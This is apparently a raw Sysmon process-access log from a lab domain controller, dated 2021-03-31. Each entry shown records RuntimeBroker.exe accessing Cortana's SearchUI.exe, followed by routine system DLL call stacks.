12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C